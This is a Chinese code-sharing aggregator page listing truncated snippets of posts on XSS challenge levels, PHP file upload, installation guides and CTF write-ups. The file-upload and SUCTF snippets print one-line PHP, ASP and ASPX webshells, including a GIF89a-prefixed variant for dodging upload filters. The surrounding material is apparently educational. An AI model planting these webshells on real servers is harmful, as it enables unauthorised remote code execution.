ICode9

精准搜索请尝试: 精确搜索
  • xss漏洞攻击-第十一关2022-07-01 21:04:54

    <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <script> window.alert = function() { confirm("完成的不错!"); window.locati

  • PHP大文件分片上传2022-07-01 16:00:06

    ​ 4GB以上超大文件上传和断点续传服务器的实现 随着视频网站和大数据应用的普及,特别是高清视频和4K视频应用的到来,超大文件上传已经成为了日常的基础应用需求。 但是在很多情况下,平台运营方并没有大文件上传和断点续传的开发经验,往往在网上找一些简单的PHP或者Java程序来实现基本

  • Mac OS 安装php7.42022-06-30 21:01:36

    安装homebrew方法(若已经安装,忽略) /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" 通过 brew 安装 brew install php@7.4 刷新php连接 brew link php@7.4 查看php版本 php -v 查看PHP的服务 brew services lis

  • 文件上传2022-06-30 20:02:27

    一句话木马:上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限 php一句话木马: <?php @eval($_POST[value]); ?> asp一句话木马: <%eval request ("value")%> 或 <% execute(request("value")) %> aspx一句话木马: <%@ Page Language="Jscript" %

  • php 上传文件压缩包2022-06-30 18:36:21

      index.php 压缩包处理,上传文件处理 <?php include('ziper.class.php'); /*接收base64的jpg图片编码,转换为图片*/ try { $file = $_FILES['image']; // 判断文件是否上传 if (!is_uploaded_file($file['tmp_name'])){ throw new Exception("

  • php-fpm 慢查询日志和错误日志2022-06-30 14:05:04

     1、php-fpm 错误日志 一般情况下,php错误日志的配置都在php.ini文件中 /usr/local/php/etc/php.ini --------------------------- error_reporting = E_ALL & ~E_DEPRECATED & ~E_STRICT display_errors = Off log_errors = On ; Log errors to specified file. PHP's default

  • [MRCTF2020]Ezpop-1|php序列化2022-06-30 00:35:10

    1、打开题目获取到源代码信息,如下: Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier { p

  • xss漏洞攻击-第七关2022-06-29 22:01:37

    <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <script> window.alert = function() { confirm("完成的不错!"); window.locati

  • php获取前一天,前一个月,前半年,前一年的时间戳2022-06-29 17:03:14

    #获取前一小时strtotime("-1 hour") #获取前一天strtotime("-1 day") #获取前一周strtotime("-1 week") #获取前一个月strtotime("-1 month") #获取前半年strtotime("-6 month") #获取前一年strtotime("-1 year")

  • php 安装composer2022-06-29 14:04:00

    1、下载安装 https://getcomposer.org/ 期间有一步是要和本地php.exe关联的 2、配置composer ①把composer安装目录下的.bat文件和.phar文件复制到你所使用的PHP的php.exe文件的目录下        ② 修改.bat文件中的内容为@php "%~dp0composer.phar" %*    ③  配置全局环

  • 解决phpcms上传服务器后后台打不开的问题2022-06-29 12:34:07

    phpcms上传服务器后怎么打不开后台? 如果有报错信息,一般情况是需要改配置文件的。 操作步骤如下: 1、把网站打包通过FTP上传到服务器,服务器解压。 2、数据库导出在导入服务器数据库。注意编码格式。 3、网站程序解压完成修改配置文件:database.php和system.php;文件需要修改网站根目录

  • php apc缓存以及与redis的对比2022-06-29 12:32:28

    apc缓存用户数据这个会用, apc_store() 和apc_fetch()函数。 那apc 缓存php 代码,这个怎么用呢?   原文: http://blog.csdn.net/w18704622664/article/details/47132061# ------------------------------------------------------------------------------------------------ APC简

  • PHP71yum安装2022-06-29 11:00:15

    rpm -Uvh https://mirror.webtatic.com/yum/el7/epel-release.rpm rpm -Uvh https://mirror.webtatic.com/yum/el7/webtatic-release.rpm rpm -Uvh https://mirrors.aliyun.com/remi/enterprise/remi-release-7.rpm yum clean all && yum makecache yum install php71

  • 攻防世界-web-新手区-webshell2022-06-28 21:02:32

    题目   考查知识 什么是webshell 对蚁剑、菜刀的使用 什么是webshell webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然

  • [SUCTF 2019]CheckIn 12022-06-28 21:02:16

    看到字符upload 就想到了文件上传漏洞 就先上传一个一句话木马试试 似乎直接上传不成功,可能是有什么过滤 再上传一个包含一句话木马的图片试试 发现提示不能是图片,这时候就不会了,在网上找了一下wp 发现需要修改一下木马的内容 GIF89a <script language='php'>@eval($_POST['a']

  • 攻防世界 lottery2022-06-28 20:31:53

    进入题目是一个类似于买彩票的东西我们先去注册个账号,然后发现可以buy flag,大概理解题目意思,我们要么只能在买彩票的时候让我们中大奖要么只能改变自己的余额,原题目应该使用dirsearch扫描发现git泄露然后使用Githack复原的但是攻防世界这边直接把源码给了我们 源码中关键函数在api

  • xss漏洞通关笔记-第一关2022-06-28 20:04:16

    每一题都先检查源码,先从源码中找问题,再看URL 1.第一关 <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <script> window.alert = function() { confirm(&qu

  • php图片上传代码2022-06-28 18:36:14

    php图片上传代码本来是一个很简单的事,之前笔者图省事,直接网上下载了一个php图片上传小程序,结果导致wordpress网站被黑,因为留有后门,后来排查直接删除整个小程序,自己用重新写了一个php图片上传功能,缺点就是只能单张上传! 简单说一些这个这段代码, 上传目录:文件当前文件夹; 图片文件夹:自

  • 攻防世界-web-新手区-cookie2022-06-28 18:02:33

    题目     本题考查 如何查看cookie的内容 获取场景     思路 说到查看cookie,我们首先想到f12中的内容。 发现不论是请求包的cookie,还是返回包的cookie,名字都是cookie.php     访问cookie.php 提示我们去看看返回包     我们f12看看返回包,得到flag  

  • 攻防世界-web-新手区-backup2022-06-28 17:33:42

    题目     本题考查 目录扫描工具的使用 常用的目录扫描工具:御剑、dirsearch 获取场景     思路 我们并不知道作者怎么给这个备份文件命名的,所以我们把它给扫描出来。用dirsearch扫描。 命令:python dirsearch.py -u http://111.200.241.244:50127/ -e php 得到备份文件名ind

  • Php 函数2022-06-28 10:31:08

    字符串函数 implode(',', $arr) // 数组 转换 字符串 explode(',', $arr) // 字符串 转换 数组 json_encode($arr) // 数组 转换 json json_decode($json, true) // json 转换 数组 str_replace ($find, $replace, $str) // 字符串替换 strlen ($str) // 查找

  • PHP JWT Token Invalid Signature2022-06-28 10:03:35

    背景: 使用jwt.io验证自定义token出现Invalid Signature   解决: 使用jwt.io验证token,要输入secret   参考资料: https://learnku.com/laravel/t/27013 https://www.e-learn.cn/topic/484582

  • PHP性能问题及优化2022-06-27 23:04:59

    什么情况下,遇到了PHP性能问题? 答: PHP语法使用的不恰当 使用PHP语言做了它不擅长做的事 用PHP语言连接的服务不给力 PHP自身的短板 也不知道的问题!!! PHP的性能问题的解决方向:    压力测试工具简介: Apache Benchmark(ab) 简介:ab是由Apache提供的压力测试软件。安装apache服务器时

  • [MRCTF2020]PYWebsite-12022-06-27 19:00:07

    1、打开之后查看源代码信息,发现存在flag.php,信息如下:    2、那就直接访问flag.php文件,信息如下:    3、看到我自己,想到应该是检查了X-Forwarded-For信息,因此bp抓包修改为:X-Forwarded-For:127.0.0.1,成功获取flag,信息如下:   

  • PHP 中 firebase/php-jwt RS256 公私钥生成指南2022-06-27 14:31:08

    所有关于 openssl_sign(): supplied key param cannot be coerced into a private/public key、Algorithm not allowed 等错误按照文章来一遍,基本就能解决了 GitHub 用多了,第一反应用 puttygen.exe 这个程序来生成,得到 id_rsa 和 id_rsa.pub 然而,这货并没有什么卵用… 当然

专注分享技术,共同学习,共同进步。侵权联系[admin#icode9.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有